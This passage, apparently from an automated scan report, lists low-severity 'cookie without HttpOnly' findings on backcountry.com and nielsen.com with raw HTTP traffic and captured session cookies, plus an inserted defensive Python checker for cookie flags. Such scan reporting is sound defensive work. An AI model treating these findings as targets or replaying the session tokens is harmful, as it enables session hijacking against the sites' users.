Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; mt.v=1.346469883.1316711542790; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; __ar_v4=; rdv_test_group=1; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; RES_TRACKINGID=841292264887481; siec=true; affiliate_reference_id=R999; __utmx=248652180.; __utmxx=248652180.; s_cc=true; mr_referredVisitor=0; s_sq=%5B%5BB%5D%5D; utag=session_id:1316711948944$_session:1316713377068; c49=PDP%3ABackcountry.com%20Gift%20Certificate

Response

HTTP/1.1 303 See Other
Server: Apache
Location: /store/BCS0021
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: badlands
Content-Length: 258
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:39 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:11:39 GMT
Set-Cookie: CART=; path=/; expires=Sun, 19-Sep-2021 12:11:39 GMT

Bouncing to <a href="/store/BCS0021">/store/BCS0021</a><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www
...[SNIP]...

4.5. http://www.backcountry.com/store/cart/ajax/check_cart_reload_needed.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /store/cart/ajax/check_cart_reload_needed.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /store/cart/ajax/check_cart_reload_needed.html HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
Content-Length: 10
Origin: http://www.backcountry.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://www.backcountry.com/store/cart/add.html?item_code=BCS0021&mv_order_group=1&mv_todo=refresh&mv_form_profile=option_check&mv_session_id=&mv_order_cat_id=&mv_order_subcat_id=&mv_order_pg_id=&mv_order_catalog_id=&mv_order_is_gift_box=0&is_package=0&is_giftcert=1&mv_javascript=1&mv_sku=BCS0021-BCSGC125-ONSI&sku_options=1&mv_order_swatch_position=&mv_order_quantity=1&x=55&y=10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; rdv_test_group=1; RES_TRACKINGID=841292264887481; __utmx=248652180.; __utmxx=248652180.; __utma=248652180.1694759348.1316711586.1316711586.1316711586.1; __utmb=248652180.1.10.1316711586; __utmc=248652180; __utmz=248652180.1316711586.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __ar_v4=; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; CART=; siec=true; affiliate_reference_id=R999; tr_template=; promo_nav=; s_cc=true; c49=Gift%20Certificate; s_sq=%5B%5BB%5D%5D; mr_referredVisitor=0; mr_domainUserTicketID=1039053c-e24c-b398-c4aa-7037768e3b34; utag=session_id:1316711948944$_session:1316713392233; mt.v=1.346469883.1316711542790

param=1661

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: wilson
Content-Length: 7
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:55 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:11:55 GMT
Set-Cookie: CART=; path=/; expires=Sun, 19-Sep-2021 12:11:55 GMT
Set-Cookie: siec=true; path=/; expires=Tue, 21-Sep-2021 22:11:55 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:11:55 GMT

false


4.6. http://www.backcountry.com/store/user.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /store/user.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /store/user.html HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; rdv_test_group=1; RES_TRACKINGID=841292264887481; __utmx=248652180.; __utmxx=248652180.; __utma=248652180.1694759348.1316711586.1316711586.1316711586.1; __utmb=248652180.1.10.1316711586; __utmc=248652180; __utmz=248652180.1316711586.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __ar_v4=; mr_referredVisitor=0; mr_domainUserTicketID=1039053c-e24c-b398-c4aa-7037768e3b34; mt.v=1.346469883.1316711542790; 9551721-VID=5110247826455; 9551721-SKEY=8682657700751775312; HumanClickSiteContainerID_9551721=STANDALONE; tr_template=; promo_nav=; s_cc=true; utag=session_id:1316711948944$_session:1316713441727; shipping_selection=FREE; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; CART=mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23; siec=false; affiliate_reference_id=R999; c49=Step%202%20Place%20Your%20Order%20Error; s_sc_scOpen=1; s_sq=bcbackcountry%3D%2526pid%253DStep%2525202%252520Place%252520Your%252520Order%252520Error%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/store/user.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: arches
Content-Length: 33985
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:13:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:13:26 GMT
Set-Cookie: siec=false; path=/; expires=Tue, 21-Sep-2021 22:13:26 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:13:26 GMT
Set-Cookie: omn_cookie=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: tr_template=; path=/; expires=Fri, 23-Sep-2011 12:13:26 GMT
Set-Cookie: cart_cross_sell=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_content_upload=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_poos=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_order_detail=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: promo_nav=; path=/; expires=Sun, 19-Sep-2021 12:13:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...

4.7. http://nielsen.com/bin/statistics/tracker/query

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /bin/statistics/tracker/query

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bin/statistics/tracker/query?q=mobile+tv+internet*&nr=4&et=47&1316693830431 HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/content/corporate/us/en/search.html?q=mobile+tv+internet
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.4.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 404 Not Found
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:17:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 226

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /bin/statistics/tracker/query was not found on this s
...[SNIP]...

4.8. http://nielsen.com/bin/statistics/tracker/result

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /bin/statistics/tracker/result

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bin/statistics/tracker/result?p=%2Fus%2Fen%2Finsights%2Fpress-room%2F2008%2Fnielsen_reports_tv&po=1&q=mobile+tv+internet*&0.2873271522112191 HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/content/corporate/us/en/search.html?q=mobile+tv+internet
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.4.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3Dmobile%20tv%20internet%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7CTAGCLOUD%3A%3D%7C; Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 404 Not Found
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:17:17 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /bin/statistics/tracker/result was not found on this
...[SNIP]...
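A small checker for this class of finding, added here as an illustration and not part of the XSS.CX report or of the scanned site: it parses the Set-Cookie headers of a raw HTTP response, reports missing HttpOnly and Secure attributes, and applies the "does this look like a session token" judgement that the issue text leaves to the reader. The sample response is constructed from the headers recorded above; the JSESSIONID line in it is hypothetical and exists only to give the heuristic a positive case.

```python
import math
from dataclasses import dataclass
from typing import Dict, List, Tuple, Union

# Constructed sample input. The first Set-Cookie line is copied from the
# /bin/statistics/tracker/result response in the report; the JSESSIONID line
# is hypothetical and only exists so the session-token heuristic has a
# positive case. Neither value comes from a live system.
SAMPLE_RESPONSE = (
    "HTTP/1.1 404 Not Found\r\n"
    "Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; "
    "expires=Thu, 22-Sep-2011 17:57:05 GMT\r\n"
    "Set-Cookie: JSESSIONID=3F2504E04F8911D39A0C0305E82C3301; Path=/\r\n"
    "Date: Thu, 22 Sep 2011 12:17:17 GMT\r\n"
    "Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8\r\n"
    "Content-Type: text/html; charset=iso-8859-1\r\n"
    "\r\n"
    "<html><body>Not Found</body></html>"
)

# Name fragments that almost always mark an authenticated session cookie.
SESSION_NAME_HINTS = ("sess", "sid", "auth", "token", "login")


@dataclass
class CookieFinding:
    name: str
    value: str
    httponly: bool
    secure: bool
    session_like: bool
    severity: str  # "OK", "Information" or "Low", mirroring the report's scale


def shannon_bits(value: str) -> float:
    """Rough entropy estimate for a cookie value: per-character Shannon
    entropy multiplied by the length, in bits. Repetitive values score low."""
    if not value:
        return 0.0
    counts: Dict[str, int] = {}
    for ch in value:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(value)
    per_char = -sum((c / n) * math.log2(c / n) for c in counts.values())
    return per_char * n


def looks_like_session_token(name: str, value: str) -> bool:
    """Heuristic, not proof: session identifiers are usually long and
    high-entropy, or carry a telltale name. A short fixed value such as
    R3976301559 fails both tests."""
    lname = name.lower()
    if any(hint in lname for hint in SESSION_NAME_HINTS):
        return True
    return len(value) >= 16 and shannon_bits(value) >= 64.0


def parse_set_cookie(header_value: str) -> Tuple[str, str, Dict[str, Union[str, bool]]]:
    """Split one Set-Cookie header value into (name, value, attributes).
    Attribute names are lower-cased; flag attributes such as HttpOnly map to True."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, Union[str, bool]] = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value.strip(), attrs


def audit_response(raw: str) -> List[CookieFinding]:
    """Walk the header block of a raw HTTP response and grade every Set-Cookie."""
    head = raw.split("\r\n\r\n", 1)[0]
    findings: List[CookieFinding] = []
    for line in head.split("\r\n")[1:]:  # skip the status line
        hname, _, hval = line.partition(":")
        if hname.strip().lower() != "set-cookie":
            continue
        name, value, attrs = parse_set_cookie(hval)
        httponly = "httponly" in attrs
        secure = "secure" in attrs
        session_like = looks_like_session_token(name, value)
        if httponly:
            severity = "OK"
        elif session_like:
            severity = "Low"          # script-readable session cookie: XSS can steal it
        else:
            severity = "Information"  # flag missing, but nothing obvious to steal
        findings.append(CookieFinding(name, value, httponly, secure, session_like, severity))
    return findings


if __name__ == "__main__":
    for f in audit_response(SAMPLE_RESPONSE):
        print(f"{f.severity:<11} {f.name}: HttpOnly={f.httponly} "
              f"Secure={f.secure} session-like={f.session_like}")
```

Running it grades the nielsen.com cookie as Information (short, low-entropy value, no HttpOnly) and the hypothetical JSESSIONID as Low. The report shows the same Nielsen.com-cookie value re-issued on every response, including 404s and static images, so before fixing, establish whether the application, the Apache tier or a device in front of it sets it; on Apache 2.2.4 or later with mod_headers, `Header edit Set-Cookie ^(.*)$ $1;HttpOnly` appends the flag to every cookie the server itself emits.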

4.9. http://nielsen.com/content/corporate/us/en/_jcr_content/logogeneric.limg.png/1291333524989.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/corporate/us/en/_jcr_content/logogeneric.limg.png/1291333524989.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/corporate/us/en/_jcr_content/logogeneric.limg.png/1291333524989.png HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:59 GMT
ETag: "e7805b-1237-4ad7b8ca440c0"
Accept-Ranges: bytes
Content-Length: 4663
Content-Type: image/png

[binary image/png body, 4663 bytes, not shown; it begins with the PNG signature, consistent with the declared Content-Type]

4.10. http://nielsen.com/content/corporate/us/en/measurement/online-measurement/_jcr_content/bannerPar/image.img.jpg/1314307161790.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/corporate/us/en/measurement/online-measurement/_jcr_content/bannerPar/image.img.jpg/1314307161790.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/corporate/us/en/measurement/online-measurement/_jcr_content/bannerPar/image.img.jpg/1314307161790.jpg HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:41:19 GMT
ETag: "be80e9-4fc5-4ad7c1ce285c0"
Accept-Ranges: bytes
Content-Length: 20421
Content-Type: image/jpeg

[binary image/jpeg body, 20421 bytes, not shown; it begins with a JFIF header, consistent with the declared Content-Type]

4.11. http://nielsen.com/content/corporate/us/en/measurement/television-measurement/_jcr_content/bannerPar/image.img.jpg/1314308133299.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/corporate/us/en/measurement/television-measurement/_jcr_content/bannerPar/image.img.jpg/1314308133299.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/corporate/us/en/measurement/television-measurement/_jcr_content/bannerPar/image.img.jpg/1314308133299.jpg HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/television-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.2.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:49 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:04:20 GMT
ETag: "e7813e-4ab4-4ad7b989f4500"
Accept-Ranges: bytes
Content-Length: 19124
Content-Type: image/jpeg

[binary image/jpeg body, 19124 bytes, not shown; it begins with a JFIF header, consistent with the declared Content-Type]

4.12. http://nielsen.com/content/corporate/us/en/search.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/corporate/us/en/search.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/corporate/us/en/search.html?q=mobile+tv+internet HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://nielsen.com/us/en/practices/cross-platform-audience-behavior.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.3.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3937166166; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:17:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 49920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8"
...[SNIP]...

4.13. http://nielsen.com/content/corporate/us/en/search/_jcr_content/par.autocomp.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/corporate/us/en/search/_jcr_content/par.autocomp.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/corporate/us/en/search/_jcr_content/par.autocomp.html?q=mobile%20t&caller=queryhead HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/practices/cross-platform-audience-behavior.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.3.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html; SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:17:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 385

<div class="search section">


{[Top U.S. Markets for Mobile
, to Acquire Telephia, Inc., The
, to Measure The Mobile Media
, Mobile And Mediamark Research &amp;
, TV, Internet and Mobile Usage
, M
...[SNIP]...

4.14. http://nielsen.com/content/cus_config/favicons/corporate/us/en/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /content/cus_config/favicons/corporate/us/en/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/cus_config/favicons/corporate/us/en/favicon.ico HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
